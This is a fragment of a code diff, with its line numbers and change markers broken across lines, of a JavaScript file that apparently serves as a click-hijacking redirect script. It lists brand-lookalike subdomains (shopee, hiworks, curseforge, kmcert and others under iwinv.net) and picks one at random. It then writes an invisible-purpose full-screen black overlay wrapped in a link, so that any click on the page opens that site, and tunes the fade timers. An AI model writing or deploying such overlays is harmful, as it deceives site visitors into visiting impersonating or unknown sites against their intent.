'https://ecount.iwinv.net/recent.php',
|
|
24
|
-
'https://hiworks.iwinv.net/recent.php',
|
|
25
|
-
'https://shopee.iwinv.net/recent.php',
|
|
26
|
-
'https://eomisae.iwinv.net/recent.php',
|
|
27
|
-
'https://kmcert.iwinv.net/recent.php',
|
|
28
|
-
'https://munpia.iwinv.net/recent.php',
|
|
29
|
-
'https://slrclub.iwinv.net/recent.php',
|
|
30
|
-
'https://interpals.iwinv.net/recent.php',
|
|
31
|
-
'https://snp500.iwinv.net/recent.php',
|
|
32
|
-
'https://dctribe.iwinv.net/recent.php',
|
|
33
|
-
'https://mixamo.iwinv.net/recent.php',
|
|
34
|
-
'https://ssssss.iwinv.net/recent.php',
|
|
35
|
-
'https://newsfactory.iwinv.net',
|
|
36
|
-
'https://snapp.im/recent.php',
|
|
37
|
-
'https://curseforge.iwinv.net/recent.php',
|
|
38
|
-
'https://lolchess.iwinv.net/recent.php',
|
|
11
|
+
'https://ssssss.iwinv.net',
|
|
12
|
+
'https://minecraft.iwinv.net',
|
|
13
|
+
'https://zzzzzz.iwinv.net',
|
|
14
|
+
'https://snapp.im/view/',
|
|
15
|
+
'https://seekr.kr/view/',
|
|
16
|
+
'https://199.kr/view/',
|
|
17
|
+
'https://manatoki.kr/view/',
|
|
39
18
|
];
|
|
40
19
|
|
|
41
20
|
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
42
21
|
document.writeln('<style>');
|
|
43
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
22
|
+
document.writeln('* {font-size: 1em !important} #button {border:1px solid #fff;border-radius:5px} #s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
44
23
|
document.writeln('</style>');
|
|
45
24
|
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
46
25
|
|
|
47
26
|
document.getElementById('container').style.boxShadow = 'none';
|
|
48
27
|
function ss(){
|
|
49
|
-
document.getElementById("s2").style.transition = "opacity
|
|
50
|
-
document.getElementById("button").style.transition = "opacity
|
|
28
|
+
document.getElementById("s2").style.transition = "opacity 7s";
|
|
29
|
+
document.getElementById("button").style.transition = "opacity 7s";
|
|
51
30
|
setTimeout("s()", 3999);
|
|
52
|
-
setTimeout("h()",
|
|
31
|
+
setTimeout("h()", 6000);
|
|
53
32
|
}
|
|
54
33
|
function pcss(){
|
|
55
34
|
setTimeout("s()", 3999);
|
|
56
|
-
setTimeout("h()",
|
|
35
|
+
setTimeout("h()", 6000);
|
|
57
36
|
}
|
|
58
37
|
function a(){
|
|
59
38
|
document.getElementById("button").style.display="none";
|